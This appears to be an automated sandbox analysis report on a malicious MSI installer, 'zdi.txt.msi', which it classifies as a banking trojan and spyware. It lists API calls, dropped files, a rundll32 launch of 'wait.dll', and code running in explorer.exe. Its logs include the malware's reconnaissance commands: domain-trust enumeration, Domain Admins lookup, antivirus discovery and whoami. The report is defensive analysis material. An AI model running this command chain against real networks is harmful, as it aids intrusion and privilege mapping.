Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000023CDA4B4BE0 NtProtectVirtualMemory,	5_2_0000023CDA4B4BE0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000023CDA4B4FF0 NtQueueApcThread,	5_2_0000023CDA4B4FF0
Source: C:\Windows\explorer.exe	Code function: 9_2_0137C704 NtDelayExecution,	9_2_0137C704
Source: C:\Windows\explorer.exe	Code function: 9_2_0137B388 NtAllocateVirtualMemory,	9_2_0137B388
Source: C:\Windows\explorer.exe	Code function: 9_2_013782B4 NtFreeVirtualMemory,	9_2_013782B4
Source: C:\Windows\explorer.exe	Code function: 9_2_01380130 NtAllocateVirtualMemory,	9_2_01380130
Source: C:\Windows\explorer.exe	Code function: 9_2_013781C8 NtWriteFile,	9_2_013781C8
Source: C:\Windows\explorer.exe	Code function: 9_2_01378240 NtClose,	9_2_01378240
Source: C:\Windows\explorer.exe	Code function: 9_2_013780B8 RtlInitUnicodeString,NtCreateFile,	9_2_013780B8
Source: C:\Windows\explorer.exe	Code function: 9_2_0B8D248C NtFreeVirtualMemory,	9_2_0B8D248C
Source: C:\Windows\explorer.exe	Code function: 9_2_0B8D241C NtAllocateVirtualMemory,	9_2_0B8D241C

Contains functionality to communicate with device drivers

Source: C:\Windows\System32\rundll32.exe

Code function: 5_2_00007FFDFA906B7C: CreateFileW,DeviceIoControl,CloseHandle,

5_2_00007FFDFA906B7C

Contains functionality to launch a process as a different user

Source: C:\Windows\System32\rundll32.exe

Code function: 5_2_00007FFDFA8ADA48 CreateEnvironmentBlock,GetLastError,_invalid_parameter_noinfo,_invalid_parameter_noinfo,DestroyEnvironmentBlock,GetSystemDirectoryW,PathAddBackslashW,swprintf,CreateProcessAsUserW,GetLastError,CloseHandle,CloseHandle,

5_2_00007FFDFA8ADA48

Creates files inside the system directory

Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\424593.msi	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI468D.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI46EC.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI471C.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI473C.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\inprogressinstallinfo.ipi	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\SourceHash{998A301A-3216-4DC9-93E2-7045B0436D77}	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI4808.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI48D4.tmp	Jump to behavior

Deletes files inside the Windows folder

Source: C:\Windows\System32\msiexec.exe

File deleted: C:\Windows\Installer\MSI468D.tmp

Jump to behavior

Detected potential crypto function

Source: C:\Windows\Installer\MSI48D4.tmp	Code function: 3_2_00C16A50	3_2_00C16A50
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: 3_2_00C4F032	3_2_00C4F032
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: 3_2_00C3C2CA	3_2_00C3C2CA
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: 3_2_00C492A9	3_2_00C492A9
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: 3_2_00C3E270	3_2_00C3E270
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: 3_2_00C484BD	3_2_00C484BD
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: 3_2_00C3A587	3_2_00C3A587
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: 3_2_00C1C870	3_2_00C1C870
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: 3_2_00C3A915	3_2_00C3A915
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: 3_2_00C34920	3_2_00C34920
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: 3_2_00C40A48	3_2_00C40A48
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: 3_2_00C19CC0	3_2_00C19CC0
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: 3_2_00C45D6D	3_2_00C45D6D
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA97BB1C	5_2_00007FFDFA97BB1C
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA989AF0	5_2_00007FFDFA989AF0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA8AFA78	5_2_00007FFDFA8AFA78
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA8B9C5C	5_2_00007FFDFA8B9C5C
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA8AC878	5_2_00007FFDFA8AC878
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA8C79F8	5_2_00007FFDFA8C79F8
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA8DEA05	5_2_00007FFDFA8DEA05
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA8BBA28	5_2_00007FFDFA8BBA28
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA994A20	5_2_00007FFDFA994A20
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA8B69A0	5_2_00007FFDFA8B69A0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA8AAF20	5_2_00007FFDFA8AAF20
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA922E90	5_2_00007FFDFA922E90
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA8C9E64	5_2_00007FFDFA8C9E64
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA8F1E90	5_2_00007FFDFA8F1E90
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA906E84	5_2_00007FFDFA906E84
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA8CBEDC	5_2_00007FFDFA8CBEDC
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA98D04C	5_2_00007FFDFA98D04C
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA990FAC	5_2_00007FFDFA990FAC
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA8ABCB8	5_2_00007FFDFA8ABCB8
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA8ADCBC	5_2_00007FFDFA8ADCBC
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA8AEDE0	5_2_00007FFDFA8AEDE0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA8B9D8C	5_2_00007FFDFA8B9D8C
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA8D530C	5_2_00007FFDFA8D530C
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA8B5320	5_2_00007FFDFA8B5320
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA998330	5_2_00007FFDFA998330
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA8E22D4	5_2_00007FFDFA8E22D4
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA8CC3A8	5_2_00007FFDFA8CC3A8
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA8D50F8	5_2_00007FFDFA8D50F8
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA8B70EC	5_2_00007FFDFA8B70EC
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA8B61E0	5_2_00007FFDFA8B61E0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA8DC180	5_2_00007FFDFA8DC180
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA9801A4	5_2_00007FFDFA9801A4
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA8CD698	5_2_00007FFDFA8CD698
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA97D670	5_2_00007FFDFA97D670
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA8B7680	5_2_00007FFDFA8B7680
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA8AA83C	5_2_00007FFDFA8AA83C
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA995834	5_2_00007FFDFA995834
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA969470	5_2_00007FFDFA969470
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA8FD604	5_2_00007FFDFA8FD604
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA8BB560	5_2_00007FFDFA8BB560
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000023CDA489500	5_2_0000023CDA489500
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000023CDA49A100	5_2_0000023CDA49A100
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000023CDA499120	5_2_0000023CDA499120
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000023CDA49B4E0	5_2_0000023CDA49B4E0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000023CDA494DB0	5_2_0000023CDA494DB0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000023CDA4A4550	5_2_0000023CDA4A4550
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000023CDA485D60	5_2_0000023CDA485D60
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000023CDA4B0210	5_2_0000023CDA4B0210
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000023CDA4A7220	5_2_0000023CDA4A7220
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000023CDA4955C0	5_2_0000023CDA4955C0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000023CDA4899D0	5_2_0000023CDA4899D0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000023CDA4AB5E0	5_2_0000023CDA4AB5E0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000023CDA4A55E0	5_2_0000023CDA4A55E0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000023CDA4916A0	5_2_0000023CDA4916A0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000023CDA4942A0	5_2_0000023CDA4942A0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000023CDA4A82A0	5_2_0000023CDA4A82A0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000023CDA48A730	5_2_0000023CDA48A730
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000023CDA4866C0	5_2_0000023CDA4866C0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000023CDA49BED0	5_2_0000023CDA49BED0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000023CDA4A66E0	5_2_0000023CDA4A66E0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000023CDA4A13A3	5_2_0000023CDA4A13A3
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000023CDA4A2BB0	5_2_0000023CDA4A2BB0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000023CDA4B1F40	5_2_0000023CDA4B1F40
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000023CDA4B2F60	5_2_0000023CDA4B2F60
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000023CDA4B2812	5_2_0000023CDA4B2812
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000023CDA4AFBC0	5_2_0000023CDA4AFBC0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000023CDA49CBE0	5_2_0000023CDA49CBE0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000023CDA4B1490	5_2_0000023CDA4B1490
Source: C:\Windows\explorer.exe	Code function: 9_2_01372164	9_2_01372164
Source: C:\Windows\explorer.exe	Code function: 9_2_01371A7C	9_2_01371A7C
Source: C:\Windows\explorer.exe	Code function: 9_2_01371A8C	9_2_01371A8C
Source: C:\Windows\explorer.exe	Code function: 9_2_0B8D4B50	9_2_0B8D4B50
Source: C:\Windows\explorer.exe	Code function: 9_2_0B969708	9_2_0B969708
Source: C:\Windows\explorer.exe	Code function: 9_2_0B91BB94	9_2_0B91BB94
Source: C:\Windows\explorer.exe	Code function: 9_2_0B96EBB8	9_2_0B96EBB8
Source: C:\Windows\explorer.exe	Code function: 9_2_0B95DB34	9_2_0B95DB34
Source: C:\Windows\explorer.exe	Code function: 9_2_0B952B38	9_2_0B952B38
Source: C:\Windows\explorer.exe	Code function: 9_2_0B940B54	9_2_0B940B54
Source: C:\Windows\explorer.exe	Code function: 9_2_0B91EA84	9_2_0B91EA84
Source: C:\Windows\explorer.exe	Code function: 9_2_0B900A8A	9_2_0B900A8A
Source: C:\Windows\explorer.exe	Code function: 9_2_0B948980	9_2_0B948980
Source: C:\Windows\explorer.exe	Code function: 9_2_0B8DD9E4	9_2_0B8DD9E4
Source: C:\Windows\explorer.exe	Code function: 9_2_0B964940	9_2_0B964940
Source: C:\Windows\explorer.exe	Code function: 9_2_0B9498B0	9_2_0B9498B0
Source: C:\Windows\explorer.exe	Code function: 9_2_0B95D8B8	9_2_0B95D8B8
Source: C:\Windows\explorer.exe	Code function: 9_2_0B92481C	9_2_0B92481C
Source: C:\Windows\explorer.exe	Code function: 9_2_0B90D834	9_2_0B90D834
Source: C:\Windows\explorer.exe	Code function: 9_2_0B908824	9_2_0B908824
Source: C:\Windows\explorer.exe	Code function: 9_2_0B937874	9_2_0B937874
Source: C:\Windows\explorer.exe	Code function: 9_2_0B8D7FD0	9_2_0B8D7FD0
Source: C:\Windows\explorer.exe	Code function: 9_2_0B94AF20	9_2_0B94AF20
Source: C:\Windows\explorer.exe	Code function: 9_2_0B919F68	9_2_0B919F68
Source: C:\Windows\explorer.exe	Code function: 9_2_0B96AE84	9_2_0B96AE84
Source: C:\Windows\explorer.exe	Code function: 9_2_0B8DBEB8	9_2_0B8DBEB8
Source: C:\Windows\explorer.exe	Code function: 9_2_0B960EC0	9_2_0B960EC0
Source: C:\Windows\explorer.exe	Code function: 9_2_0B931ECC	9_2_0B931ECC
Source: C:\Windows\explorer.exe	Code function: 9_2_0B927EE8	9_2_0B927EE8
Source: C:\Windows\explorer.exe	Code function: 9_2_0B8EFE38	9_2_0B8EFE38
Source: C:\Windows\explorer.exe	Code function: 9_2_0B969D94	9_2_0B969D94
Source: C:\Windows\explorer.exe	Code function: 9_2_0B8F9D94	9_2_0B8F9D94
Source: C:\Windows\explorer.exe	Code function: 9_2_0B928DF8	9_2_0B928DF8
Source: C:\Windows\explorer.exe	Code function: 9_2_0B90EDE0	9_2_0B90EDE0
Source: C:\Windows\explorer.exe	Code function: 9_2_0B900D18	9_2_0B900D18
Source: C:\Windows\explorer.exe	Code function: 9_2_0B945D68	9_2_0B945D68
Source: C:\Windows\explorer.exe	Code function: 9_2_0B8D9CBC	9_2_0B8D9CBC
Source: C:\Windows\explorer.exe	Code function: 9_2_0B937C14	9_2_0B937C14
Source: C:\Windows\explorer.exe	Code function: 9_2_0B8FFC72	9_2_0B8FFC72
Source: C:\Windows\explorer.exe	Code function: 9_2_0B9473A0	9_2_0B9473A0
Source: C:\Windows\explorer.exe	Code function: 9_2_0B9183EC	9_2_0B9183EC
Source: C:\Windows\explorer.exe	Code function: 9_2_0B8DE31C	9_2_0B8DE31C
Source: C:\Windows\explorer.exe	Code function: 9_2_0B8D6358	9_2_0B8D6358
Source: C:\Windows\explorer.exe	Code function: 9_2_0B95B370	9_2_0B95B370
Source: C:\Windows\explorer.exe	Code function: 9_2_0B8ED19C	9_2_0B8ED19C
Source: C:\Windows\explorer.exe	Code function: 9_2_0B92318C	9_2_0B92318C
Source: C:\Windows\explorer.exe	Code function: 9_2_0B9051C0	9_2_0B9051C0
Source: C:\Windows\explorer.exe	Code function: 9_2_0B9311CC	9_2_0B9311CC
Source: C:\Windows\explorer.exe	Code function: 9_2_0B9001FB	9_2_0B9001FB
Source: C:\Windows\explorer.exe	Code function: 9_2_0B930114	9_2_0B930114
Source: C:\Windows\explorer.exe	Code function: 9_2_0B944134	9_2_0B944134
Source: C:\Windows\explorer.exe	Code function: 9_2_0B940154	9_2_0B940154
Source: C:\Windows\explorer.exe	Code function: 9_2_0B9170C0	9_2_0B9170C0
Source: C:\Windows\explorer.exe	Code function: 9_2_0B92F018	9_2_0B92F018
Source: C:\Windows\explorer.exe	Code function: 9_2_0B8F6038	9_2_0B8F6038
Source: C:\Windows\explorer.exe	Code function: 9_2_0B93A048	9_2_0B93A048
Source: C:\Windows\explorer.exe	Code function: 9_2_0B90E074	9_2_0B90E074
Source: C:\Windows\explorer.exe	Code function: 9_2_0B8D6078	9_2_0B8D6078
Source: C:\Windows\explorer.exe	Code function: 9_2_0B938788	9_2_0B938788
Source: C:\Windows\explorer.exe	Code function: 9_2_0B8E77E0	9_2_0B8E77E0
Source: C:\Windows\explorer.exe	Code function: 9_2_0B94672C	9_2_0B94672C
Source: C:\Windows\explorer.exe	Code function: 9_2_0B8F5768	9_2_0B8F5768
Source: C:\Windows\explorer.exe	Code function: 9_2_0B95D63C	9_2_0B95D63C
Source: C:\Windows\explorer.exe	Code function: 9_2_0B8F9650	9_2_0B8F9650
Source: C:\Windows\explorer.exe	Code function: 9_2_0B9005A0	9_2_0B9005A0
Source: C:\Windows\explorer.exe	Code function: 9_2_0B91B5D0	9_2_0B91B5D0
Source: C:\Windows\explorer.exe	Code function: 9_2_0B9305FC	9_2_0B9305FC
Source: C:\Windows\explorer.exe	Code function: 9_2_0B8FF5FB	9_2_0B8FF5FB
Source: C:\Windows\explorer.exe	Code function: 9_2_0B945534	9_2_0B945534
Source: C:\Windows\explorer.exe	Code function: 9_2_0B8D453C	9_2_0B8D453C
Source: C:\Windows\explorer.exe	Code function: 9_2_0B8F0540	9_2_0B8F0540
Source: C:\Windows\explorer.exe	Code function: 9_2_0B8D8568	9_2_0B8D8568
Source: C:\Windows\explorer.exe	Code function: 9_2_0B934564	9_2_0B934564
Source: C:\Windows\explorer.exe	Code function: 9_2_0B933498	9_2_0B933498
Source: C:\Windows\explorer.exe	Code function: 9_2_0B9384D8	9_2_0B9384D8
Source: C:\Windows\explorer.exe	Code function: 9_2_0B91F4C4	9_2_0B91F4C4
Source: C:\Windows\explorer.exe	Code function: 9_2_0B9594F0	9_2_0B9594F0
Source: C:\Windows\explorer.exe	Code function: 9_2_0B942430	9_2_0B942430
Source: C:\Windows\explorer.exe	Code function: 9_2_0B92E45C	9_2_0B92E45C
Source: C:\Windows\explorer.exe	Code function: 9_2_0B927448	9_2_0B927448

Found potential string decryption / allocating functions

Source: C:\Windows\System32\rundll32.exe	Code function: String function: 00007FFDFA979670 appears 61 times
Source: C:\Windows\System32\rundll32.exe	Code function: String function: 00007FFDFA8BECA0 appears 298 times
Source: C:\Windows\System32\rundll32.exe	Code function: String function: 00007FFDFA8BC6C0 appears 198 times
Source: C:\Windows\System32\rundll32.exe	Code function: String function: 00007FFDFA979868 appears 296 times
Source: C:\Windows\System32\rundll32.exe	Code function: String function: 00007FFDFA8BF210 appears 62 times
Source: C:\Windows\explorer.exe	Code function: String function: 0B8DD6E8 appears 52 times
Source: C:\Windows\explorer.exe	Code function: String function: 0B8DE160 appears 147 times
Source: C:\Windows\explorer.exe	Code function: String function: 0B8DD5A8 appears 35 times
Source: C:\Windows\explorer.exe	Code function: String function: 0B8F7D54 appears 31 times
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: String function: 00C3325F appears 103 times
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: String function: 00C33790 appears 39 times
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: String function: 00C33292 appears 66 times

Sample file is different than original file name gathered from version info

Source: zdi.txt.msi	Binary or memory string: OriginalFilenameviewer.exeF vs zdi.txt.msi
Source: zdi.txt.msi	Binary or memory string: OriginalFilenameAICustAct.dllF vs zdi.txt.msi

Source: classification engine

Classification label: mal100.spre.bank.troj.spyw.evad.winMSI@69/30@4/3

Source: C:\Windows\Installer\MSI48D4.tmp

Code function: 3_2_00C13860 CreateToolhelp32Snapshot,CloseHandle,Process32FirstW,OpenProcess,CloseHandle,Process32NextW,CloseHandle,

3_2_00C13860

Source: C:\Windows\Installer\MSI48D4.tmp

Code function: 3_2_00C14BA0 CoInitialize,CoCreateInstance,VariantInit,VariantClear,IUnknown_QueryService,IUnknown_QueryInterface_Proxy,IUnknown_QueryInterface_Proxy,CoAllowSetForegroundWindow,SysAllocString,SysAllocString,SysAllocString,SysAllocString,VariantInit,OpenProcess,WaitForSingleObject,GetExitCodeProcess,CloseHandle,LocalFree,VariantClear,VariantClear,VariantClear,VariantClear,VariantClear,SysFreeString,VariantClear,CoUninitialize,_com_issue_error,

3_2_00C14BA0

Source: C:\Windows\Installer\MSI48D4.tmp

Code function: 3_2_00C145B0 LoadResource,LockResource,SizeofResource,

3_2_00C145B0

Source: C:\Windows\System32\msiexec.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\CML4871.tmp

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7652:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7412:120:WilError_03
Source: C:\Windows\System32\rundll32.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5104:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2920:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3716:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5840:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1272:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5088:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7228:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6296:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7988:120:WilError_03

Source: C:\Windows\System32\msiexec.exe

File created: C:\Windows\TEMP\~DFCEF614FEBAB0279B.TMP

Jump to behavior

Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Windows\explorer.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\Installer\MSI48D4.tmp

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown

Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\wait.dll, Jump

Source: ucsafe64.tmp.9.dr

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: unknown	Process created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\zdi.txt.msi"
Source: unknown	Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 55FA980756605C03F579DEFA7A4ADAF1
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\Installer\MSI48D4.tmp "C:\Windows\Installer\MSI48D4.tmp" /DontWait C:/Windows/SysWOW64/rundll32.exe C:\Users\user\AppData\Roaming\wait.dll, Jump
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\wait.dll, Jump
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\System32\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\wait.dll, Jump
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c ipconfig /all
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\ipconfig.exe ipconfig /all
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c systeminfo
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\systeminfo.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts /all_trusts
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts /all_trusts
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c net view /all /domain
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all /domain
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c net view /all
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c net group "Domain Admins" /domain
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net group "Domain Admins" /domain
Source: C:\Windows\System32\net.exe	Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 group "Domain Admins" /domain
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\wbem\WMIC.exe /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List
Source: C:\Windows\System32\wbem\WMIC.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c net config workstation
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net config workstation
Source: C:\Windows\System32\net.exe	Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 config workstation
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName \| findstr /V /B /C:displayName \|\| echo No Antivirus installed
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /V /B /C:displayName
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c whoami /groups
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami /groups
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 55FA980756605C03F579DEFA7A4ADAF1	Jump to behavior
